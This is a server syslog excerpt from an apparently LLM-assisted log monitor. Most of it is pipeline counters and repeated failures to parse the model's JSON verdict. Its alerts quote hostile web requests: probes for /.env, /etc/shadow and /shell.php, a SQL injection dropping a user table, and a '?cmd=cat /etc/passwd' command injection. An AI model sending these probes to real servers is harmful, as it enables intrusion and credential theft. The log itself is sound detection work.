Mar 19 23:09:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:09:52.978695 [observer] Patterns: hash=132 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:10:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:10:22.974936 [observer] Pipeline: processed=152 pattern_hits=134 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:10:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:10:22.974961 [observer] Patterns: hash=134 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:10:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:10:52.974909 [observer] Pipeline: processed=158 pattern_hits=140 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:10:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:10:52.974933 [observer] Patterns: hash=140 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:11:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:11:22.976981 [observer] Pipeline: processed=160 pattern_hits=142 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:11:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:11:22.977009 [observer] Patterns: hash=142 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:11:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:11:52.990276 [observer] Pipeline: processed=162 pattern_hits=144 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:11:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:11:52.990309 [observer] Patterns: hash=144 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:12:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:12:22.975742 [observer] Pipeline: processed=166 pattern_hits=148 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:12:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:12:22.975767 [observer] Patterns: hash=148 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:12:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:12:52.988437 [observer] Pipeline: processed=168 pattern_hits=150 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:12:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:12:52.988460 [observer] Patterns: hash=150 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:13:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:13:22.974866 [observer] Pipeline: processed=172 pattern_hits=154 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:13:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:13:22.974901 [observer] Patterns: hash=154 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:13:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:13:52.985915 [observer] Pipeline: processed=174 pattern_hits=156 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:13:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:13:52.985944 [observer] Patterns: hash=156 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:14:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:14:22.974965 [observer] Pipeline: processed=178 pattern_hits=160 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:14:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:14:22.974988 [observer] Patterns: hash=160 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:14:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:14:52.975018 [observer] Pipeline: processed=180 pattern_hits=162 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:14:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:14:52.975045 [observer] Patterns: hash=162 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:15:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:15:22.975842 [observer] Pipeline: processed=182 pattern_hits=164 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:15:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:15:22.975866 [observer] Patterns: hash=164 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:15:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:15:52.975937 [observer] Pipeline: processed=188 pattern_hits=170 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:15:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:15:52.975966 [observer] Patterns: hash=170 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:16:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:16:22.976037 [observer] Pipeline: processed=190 pattern_hits=172 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:16:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:16:22.976062 [observer] Patterns: hash=172 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:16:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:16:52.975075 [observer] Pipeline: processed=194 pattern_hits=176 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:16:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:16:52.975098 [observer] Patterns: hash=176 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:17:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:17:22.975863 [observer] Pipeline: processed=196 pattern_hits=178 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:17:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:17:22.975887 [observer] Patterns: hash=178 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:17:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:17:52.975490 [observer] Pipeline: processed=200 pattern_hits=182 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:17:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:17:52.975512 [observer] Patterns: hash=182 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:18:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:18:22.976236 [observer] Pipeline: processed=202 pattern_hits=184 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:18:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:18:22.976260 [observer] Patterns: hash=184 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:18:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:18:52.992821 [observer] Pipeline: processed=204 pattern_hits=186 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:18:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:18:52.992845 [observer] Patterns: hash=186 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:19:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:19:22.976495 [observer] Pipeline: processed=208 pattern_hits=190 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:19:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:19:22.976519 [observer] Patterns: hash=190 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:19:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:19:52.989516 [observer] Pipeline: processed=210 pattern_hits=192 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:19:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:19:52.989544 [observer] Patterns: hash=192 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:20:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:20:22.975061 [observer] Pipeline: processed=214 pattern_hits=196 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:20:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:20:22.975187 [observer] Patterns: hash=196 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:20:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:20:52.976782 [observer] Pipeline: processed=218 pattern_hits=200 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:20:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:20:52.976813 [observer] Patterns: hash=200 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:21:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:21:22.975516 [observer] Pipeline: processed=222 pattern_hits=204 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:21:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:21:22.975542 [observer] Patterns: hash=204 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:21:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:21:52.977043 [observer] Pipeline: processed=224 pattern_hits=206 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:21:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:21:52.977070 [observer] Patterns: hash=206 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:22:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:22:22.991339 [observer] Pipeline: processed=226 pattern_hits=208 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:22:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:22:22.991361 [observer] Patterns: hash=208 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:22:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:22:52.976285 [observer] Pipeline: processed=230 pattern_hits=212 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:22:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:22:52.976322 [observer] Patterns: hash=212 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:23:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:22.988295 [observer] Pipeline: processed=233 pattern_hits=214 llm_calls=18 llm_errors=17 learned=0
Mar 19 23:23:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:22.988327 [observer] Patterns: hash=214 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=19
Mar 19 23:23:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:24.257827 [llm] Failed to parse verdict from:
Mar 19 23:23:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:24.257864 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:23:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:24.257875 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:23:09.463883617Z 2026/03/19 23:23:09 [error] 422#422: *742244 open() "/usr/share/nginx...
Mar 19 23:23:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:24.257925 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T23:23:09.463942106Z 31.57.41.45 - - [19/Mar/2026:23:23:09 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like ...
Mar 19 23:23:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:39.231885 [llm] Failed to parse verdict from:
Mar 19 23:23:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:39.231922 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:23:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:39.231933 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:23:10.245901415Z 31.57.41.45 - - [19/Mar/2026:23:23:10 +0000] "54.200.221.0" "POST / H...
Mar 19 23:23:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:52.975741 [observer] Pipeline: processed=239 pattern_hits=219 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:23:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:23:52.975769 [observer] Patterns: hash=219 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:24:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:24:22.977060 [observer] Pipeline: processed=241 pattern_hits=221 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:24:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:24:22.977085 [observer] Patterns: hash=221 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:24:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:24:52.976728 [observer] Pipeline: processed=245 pattern_hits=225 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:24:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:24:52.976759 [observer] Patterns: hash=225 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:25:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:25:22.976811 [observer] Pipeline: processed=247 pattern_hits=227 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:25:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:25:22.976834 [observer] Patterns: hash=227 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:25:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:25:52.990526 [observer] Pipeline: processed=249 pattern_hits=229 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:25:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:25:52.990550 [observer] Patterns: hash=229 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:26:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:26:22.976422 [observer] Pipeline: processed=255 pattern_hits=235 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:26:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:26:22.976453 [observer] Patterns: hash=235 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:26:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:26:52.988609 [observer] Pipeline: processed=257 pattern_hits=237 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:26:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:26:52.988636 [observer] Patterns: hash=237 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:27:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:27:22.976452 [observer] Pipeline: processed=261 pattern_hits=241 llm_calls=19 llm_errors=19 learned=0
Mar 19 23:27:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:27:22.976476 [observer] Patterns: hash=241 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=20
Mar 19 23:27:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:27:52.975146 [observer] Pipeline: processed=265 pattern_hits=243 llm_calls=21 llm_errors=19 learned=0
Mar 19 23:27:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:27:52.975194 [observer] Patterns: hash=243 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=22
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.461304 [llm] Failed to parse verdict from:
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.461355 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.461366 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:27:47.694186554Z 98.152.173.124 - - [19/Mar/2026:23:27:47 +0000] "api.admin.kovicloud....
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.628547 [llm] Failed to parse verdict from:
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.628586 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 23:28:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:03.628595 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:27:47.694326428Z 10.0.1.9 - - [19/Mar/2026:23:27:47 +0000] "GET / HTTP/1.0" 200 34020 ...
Mar 19 23:28:19 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:19.706637 [llm] Failed to parse verdict from:
Mar 19 23:28:19 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:19.706670 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 23:28:19 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:19.706679 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:27:52.287269071Z 10.0.1.9 - - [19/Mar/2026:23:27:52 +0000] "GET / HTTP/1.0" 200 34020 ...
Mar 19 23:28:20 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:20.150199 [llm] Failed to parse verdict from:
Mar 19 23:28:20 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:20.150233 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:28:20 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:20.150241 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:27:52.287566903Z 98.152.173.124 - - [19/Mar/2026:23:27:52 +0000] "api.admin.kovicloud....
Mar 19 23:28:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:22.975810 [observer] Pipeline: processed=271 pattern_hits=247 llm_calls=23 llm_errors=23 learned=0
Mar 19 23:28:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:22.975837 [observer] Patterns: hash=247 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=24
Mar 19 23:28:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:52.976270 [observer] Pipeline: processed=273 pattern_hits=249 llm_calls=23 llm_errors=23 learned=0
Mar 19 23:28:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:28:52.976302 [observer] Patterns: hash=249 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=24
Mar 19 23:29:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:29:22.989710 [observer] Pipeline: processed=275 pattern_hits=251 llm_calls=23 llm_errors=23 learned=0
Mar 19 23:29:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:29:22.989736 [observer] Patterns: hash=251 prefix=0 regex=0 contains=0 deny=5 alert=0 suppress=0 misses=24
Mar 19 23:29:45 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:29:45.937643 [ALERT] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Shadow password file access Line=2026-03-19T23:29:45.937343066Z 10.0.1.9 - - [19/Mar/2026:23:29:45 +0000] "GET /etc/shadow HTTP/1.0" 404 6603 "-" "curl/8.5.0" "98.152.173.124"
Mar 19 23:29:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:29:52.976584 [observer] Pipeline: processed=280 pattern_hits=254 llm_calls=25 llm_errors=23 learned=0
Mar 19 23:29:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:29:52.976616 [observer] Patterns: hash=253 prefix=0 regex=0 contains=1 deny=6 alert=0 suppress=0 misses=26
Mar 19 23:30:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:03.541559 [llm] Failed to parse verdict from:
Mar 19 23:30:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:03.541603 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:30:03 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:03.541614 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:45.936915038Z 98.152.173.124 - - [19/Mar/2026:23:29:45 +0000] "api.admin.kovicloud....
Mar 19 23:30:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:04.586791 [llm] Failed to parse verdict from:
Mar 19 23:30:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:04.586830 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 23:30:04 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:04.586839 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:29:46.751428478Z 10.0.1.9 - - [19/Mar/2026:23:29:46 +0000] "GET /?id=1;DROP+TABLE+user...
Mar 19 23:30:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:22.005863 [llm] Failed to parse verdict from:
Mar 19 23:30:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:22.005898 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:30:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:22.005907 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:46.752130725Z 98.152.173.124 - - [19/Mar/2026:23:29:46 +0000] "api.admin.kovicloud....
Mar 19 23:30:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:22.976287 [observer] Pipeline: processed=284 pattern_hits=255 llm_calls=28 llm_errors=26 learned=0
Mar 19 23:30:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:22.976318 [observer] Patterns: hash=254 prefix=0 regex=0 contains=1 deny=6 alert=0 suppress=0 misses=29
Mar 19 23:30:23 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:23.571483 [llm] Failed to parse verdict from:
Mar 19 23:30:23 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:23.571520 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input
Mar 19 23:30:23 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:23.571531 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:29:46.946096996Z 10.0.1.9 - - [19/Mar/2026:23:29:46 +0000] "GET /wp-admin/install.php ...
Mar 19 23:30:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:39.528139 [llm] Failed to parse verdict from:
Mar 19 23:30:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:39.528192 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:30:39 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:39.528203 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:46.946097849Z 98.152.173.124 - - [19/Mar/2026:23:29:46 +0000] "api.admin.kovicloud....
Mar 19 23:30:40 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:40.829777 [llm] Failed to parse verdict from: Mar 19 23:30:40 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:40.829819 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input Mar 19 23:30:40 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:40.829828 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:29:47.099627580Z 2026/03/19 23:29:47 [error] 10#10: *4712 access forbidden by rule, cl... Mar 19 23:30:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:52.977624 [observer] Pipeline: processed=288 pattern_hits=256 llm_calls=31 llm_errors=29 learned=0 Mar 19 23:30:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:52.977652 [observer] Patterns: hash=255 prefix=0 regex=0 contains=1 deny=6 alert=0 suppress=0 misses=32 Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.293375 [llm] Failed to parse verdict from: Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.293410 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.293419 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:47.099819255Z 98.152.173.124 - - [19/Mar/2026:23:29:47 +0000] "api.admin.kovicloud.... 
Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.887768 [llm] Failed to parse verdict from: Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.887800 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input Mar 19 23:30:57 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:30:57.887809 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:29:47.099998115Z 10.0.1.9 - - [19/Mar/2026:23:29:47 +0000] "GET /.env HTTP/1.0" 403 14... Mar 19 23:31:14 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:14.604876 [llm] Failed to parse verdict from: Mar 19 23:31:14 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:14.604915 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 23:31:14 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:14.604925 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:47.255063079Z 98.152.173.124 - - [19/Mar/2026:23:29:47 +0000] "api.admin.kovicloud.... Mar 19 23:31:15 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:15.737063 [llm] Failed to parse verdict from: Mar 19 23:31:15 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:15.737101 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input Mar 19 23:31:15 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:15.737110 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T23:29:47.255021805Z 10.0.1.9 - - [19/Mar/2026:23:29:47 +0000] "GET /shell.php HTTP/1.0" 4... 
Mar 19 23:31:15 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:15.737261 [ALERT] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Reason=Password file access Line=2026-03-19T23:29:48.064933362Z 10.0.1.9 - - [19/Mar/2026:23:29:48 +0000] "GET /?cmd=cat+/etc/passwd HTTP/1.0" 200 34020 "-" "curl/8.5.0" "98.152.173.124" Mar 19 23:31:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:22.975221 [observer] Pipeline: processed=293 pattern_hits=258 llm_calls=34 llm_errors=33 learned=0 Mar 19 23:31:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:22.975242 [observer] Patterns: hash=256 prefix=0 regex=0 contains=2 deny=7 alert=0 suppress=0 misses=35 Mar 19 23:31:32 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:32.233847 [llm] Failed to parse verdict from: Mar 19 23:31:32 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:32.233941 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 23:31:32 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:31:32.233952 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:29:48.065267399Z 98.152.173.124 - - [19/Mar/2026:23:29:48 +0000] "api.admin.kovicloud.... 
